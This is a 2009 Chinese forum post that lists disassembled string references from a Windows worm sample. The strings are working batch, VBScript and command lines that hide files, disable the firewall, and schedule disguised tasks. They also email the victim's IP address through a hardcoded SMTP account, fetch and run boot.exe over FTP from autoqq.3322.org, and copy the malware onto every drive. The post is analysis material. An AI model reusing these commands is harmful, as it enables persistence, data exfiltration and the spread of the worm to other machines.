不是什么U盘病毒,类似于email worm
Ultra String Reference Plugin
Address Disassembly Text String
0040148C push 004078A0 (Initial CPU selection)
0040BCD7 push 00407E30 explorer.exe
0040BEB2 push 00407EAC C:\WINDOWS\system32\down.exe
0040BEBB push 00407E90 \
0040BEE8 push 00407E9C .exe
0040BF3E mov dword ptr [ebp-54], 00407EEC cmd /c at 2 | find /i "cmd /c cmd" && echo ok >1 >C:\WINDOWS\system32\ativco.txt &exit
0040BF77 mov dword ptr [ebp-54], 00407FA0 C:\WINDOWS\system32\ativco.txt
0040BFE1 mov dword ptr [ebp-54], 00407FEC cmd /c del C:\WINDOWS\system32\ativco.txt /q
0040C03B push 0040804C C:\WINDOWS\system32\ativcox.DLL
0040C053 push 00408090 reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
0040C06F push 0040822C reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
0040C08B push 00408314 reg add HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
0040C0A7 push 00408420 ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^a^t^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^s^y^s^t^e^n^3^2^.^e^x^e
0040C0C3 push 0040852C net stop sharedaccess
0040C0DF push 0040855C sc stop sharedaccess
0040C0FB push 0040858C sc config schedule start= auto
0040C117 push 004085D0 net start schedule
0040C133 push 004083F4 sc start schedule
0040C14F push 00408170 systen32 /del /y
0040C16B push 004085FC for /L %i IN (3,3,58) DO systen32 9:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C187 push 004086E0 for /L %i IN (3,3,58) DO systen32 10:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1A3 push 004087C8 for /L %i IN (3,3,58) DO systen32 11:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1BF push 004088B0 for /L %i IN (3,3,58) DO systen32 12:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1DB push 00408998 for /L %i IN (3,3,58) DO systen32 13:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C1F7 push 00408A80 for /L %i IN (3,3,58) DO systen32 14:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C213 push 00408B68 for /L %i IN (3,3,58) DO systen32 15:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C22F push 00408C50 for /L %i IN (3,3,58) DO systen32 16:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C24B push 00408D38 for /L %i IN (3,3,58) DO systen32 17:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C267 push 00408E20 for /L %i IN (3,3,58) DO systen32 18:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C283 push 00408F08 for /L %i IN (3,3,58) DO systen32 19:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C29F push 00408FF0 for /L %i IN (3,3,58) DO systen32 20:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2BB push 004090D8 for /L %i IN (3,3,58) DO systen32 21:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2D7 push 004091C0 for /L %i IN (3,3,58) DO systen32 22:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C2F3 push 004092A8 for /L %i IN (3,3,58) DO systen32 23:0%i:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\Attusb.dll
0040C30F push 00409390 for /L %i IN (12,1,23) DO systen32 %i:00:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\ATT.bat
0040C32B push 00409470 systen32 20:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C347 push 00409518 systen32 21:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C363 push 0040964C systen32 22:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C37F push 004096F4 systen32 23:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C39B push 0040980C systen32 00:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3B7 push 004098B4 systen32 00:30 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3D3 push 004099F4 systen32 01:00 /every:m,t,w,th,f,s,su cmd /c cmd ^<%SystemRoot%\system32\WIN.bat
0040C3EF push 00409A9C ipconfig /all >C:\WINDOWS\system32\a.txt
0040C40B push 00409AF4 for /f "delims=" %a in ('findstr "Address" C:\WINDOWS\system32\a.txt') do echo %a>>C:\WINDOWS\system32\b.txt
0040C427 push 00409BD4 for /f "delims=" %a in ('findstr "IP " C:\WINDOWS\system32\b.txt') do echo %a >>C:\WINDOWS\system32\c.txt
0040C45F push 00409DA8 del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt /q
0040C47B push 00409E8C C:\WINDOWS\system32\mail3.vbe
0040C497 push 00409F8C del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt
0040C4B3 push 0040A17C ATTRIB C:\WINDOWS\system32\mail3.vbe +s +h & ATTRIB C:\WINDOWS\system32\Attusb.dll +s +h & ATTRIB C:\WINDOWS\system32\autousb.ba
0040C4CF push 0040A2E8 exit
0040C509 push 00409E8C C:\WINDOWS\system32\mail3.vbe
0040C521 push 0040A2F8 On Error Resume Next
0040C53D push 0040A328 mailto="294503954@qq.com"
0040C559 push 0040A068 Dim fso, f
0040C575 push 0040A084 Set fso = CreateObject("Scripting.FileSystemObject")
0040C591 push 0040A0F4 Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
0040C5AD push 00409ECC mailbody=f.ReadAll
0040C5C9 push 00409EF8 f.Close
0040C5E5 push 00409F0C NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
0040C601 push 0040995C set Email = CreateObject("CDO.Message")
0040C61D push 004099B0 Email.From = "sunhopp@tom.com"
0040C639 push 00409D80 Email.To = mailto
0040C655 push 0040979C Email.Subject = mailbody
0040C671 push 004097D4 Email.Textbody = mailbody
0040C68D push 004095C0 with Email.Configuration.Fields
0040C6A9 push 00409604 .Item(NameSpace&"sendusing") = 2
0040C6C5 push 00408198 .Item(NameSpace&"smtpserver") = "smtp.tom.com"
0040C6E1 push 0040A360 .Item(NameSpace&"smtpserverport") = 25
0040C6FD push 0040A3B4 .Item(NameSpace&"smtpauthenticate") = 1
0040C719 push 0040A408 .Item(NameSpace&"sendusername") = "sunhopp"
0040C735 push 0040A464 .Item(NameSpace&"sendpassword") = "autocad"
0040C751 push 0040A4C0 .Update
0040C76D push 0040A4D4 end With
0040C789 push 0040A4EC Email.Send
0040C7A5 push 0040A508 Wscript.quit
0040C7D0 push 0040A528 C:\WINDOWS\system32\Attusb.dll
0040C7E8 push 0040A56C Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
0040C804 push 0040A5EC ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
0040C820 push 0040A718 ^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^
0040C83C push 0040A82C Systen /c %SystemRoot%\system32\autousb.bat
0040C876 push 0040A888 C:\WINDOWS\system32\autousb.bat
0040C88E push 0040A8F8 setlocal EnableDelayedExpansion
0040C8AA push 0040A93C :1
0040C8C6 push 0040A948 fsutil fsinfo drives >%SystemRoot%\system32\output.txt
0040C8E2 push 0040A9BC find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
0040C8FE push 0040AA58 del %SystemRoot%\system32\output.txt /q
0040C91A push 0040AAE0 for /f %%i in (%SystemRoot%\system32\out.txt) do (
0040C952 push 0040AC00 )
0040C96E push 0040AC08 if not exist %SystemRoot%\system32\output.txt goto 3
0040C98A push 0040ACBC for /f %%r in (%SystemRoot%\system32\output.txt) do (
0040C9A6 push 0040AD2C set var=%%r
0040C9C2 push 0040AD48 cd /d !var!
0040C9DE push 0040AD64 dir /a:d-s /b > %SystemRoot%\system32\ok.txt
0040C9FA push 0040ADC4 for /f %%q in (%SystemRoot%\system32\ok.txt) do (
0040CA16 push 0040AE7C ATTRIB %%q /s /d +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
0040CA32 push 0040AF1C del %SystemRoot%\system32\ok.txt /q
0040CA4E push 0040AC00 )
0040CA6A push 0040AC00 )
0040CA86 push 0040AF68 :3
0040CAA2 push 0040AF74 EXPL0RER /n 10 127.0.1 &goto 1
0040CADC push 0040AFB8 C:\WINDOWS\system32\WIN.bat
0040CAF4 push 0040AFF4 @ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
0040CB10 push 0040AE2C @ if %ERRORLEVEL%==0 goto ok
0040CB2C push 0040AC78 @ if %ERRORLEVEL%==1 goto end
0040CB48 push 0040AE6C :ok
0040CB64 push 0040AAAC @ net stop sharedaccess
0040CB80 push 0040855C sc stop sharedaccess
0040CB9C push 0040B058 ^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
0040CBB8 push 0040B0BC @ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S
0040CBD4 push 0040B230 @ cmd /c sc config DNSSystem displayname= "System DNS"
0040CBF0 push 0040B2A4 @ cmd /c sc config DNSSystem type= interact type= own
0040CC28 push 0040B3E8 @ sc start DNSSystem
0040CC44 push 0040B418 %SystemRoot%\system32\SuCH0ST.exe
0040CC60 push 0040B460 @ exit
0040CC7C push 0040B474 :end
0040CC98 push 0040AAAC @ net stop sharedaccess
0040CCB4 push 0040855C sc stop sharedaccess
0040CCD0 push 0040B484 del boot.exe /q
0040CCEC push 0040B4A8 echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo bye >> 1.RMVB
0040CD08 push 0040B5B0 ftp -s:1.RMVB
0040CD24 push 0040B5D0 del 1.RMVB
0040CD40 push 0040A8CC ping 127.0.0.1 -n 3
0040CD5C push 0040A6F4 cmd /c boot.exe
0040CD78 push 004081FC ping 127.0.0.1 -n 10
0040CD94 push 0040B484 del boot.exe /q
0040CDB0 push 0040A2E8 exit
0040CDEA push 0040B5EC C:\WINDOWS\system32\idnd.dll
0040CE02 push 0040B62C at| find /i "cmd /c cmd" && exit
0040CE1E push 0040858C sc config schedule start= auto
0040CE3A push 004085D0 net start schedule
0040CE56 push 004083F4 sc start schedule
0040CE72 push 0040B674 set/a mm=%time:~3,2%
0040CE8E push 0040B6A4 set/a hh=%time:~0,2%
0040CEAA push 0040B6D4 set/a mm=%mm%+2
0040CEC6 push 0040B6F8 set/a a=%mm%
0040CEE2 push 0040B718 if %a%==60 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CEFE push 0040B784 if %a%==61 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF1A push 0040B7E4 if %a%==62 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF36 push 0040B844 if %a%==63 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF52 push 0040B8A4 if %a%==64 set/a mm=%mm%-60 & set/a hh=%hh%+1
0040CF6E push 0040B914 at %hh%:%mm% cmd /c cmd ^<C:\WINDOWS\system32\ativcox.DLL
0040CF8A push 0040B990 del C:\WINDOWS\system32\idnd.dll /q
0040CFA6 push 0040A2E8 exit
0040CFD1 mov dword ptr [ebp-54], 0040B9DC cmd /c cmd <C:\WINDOWS\system32\idnd.dll
[ 本帖最后由 EQ2 于 2009-3-26 11:48 编辑 ] |
发表于 2009-3-26 11:36:45
发表于 2009-3-26 11:46:28
发表于 2009-3-26 11:46:50
生成物放上来..~
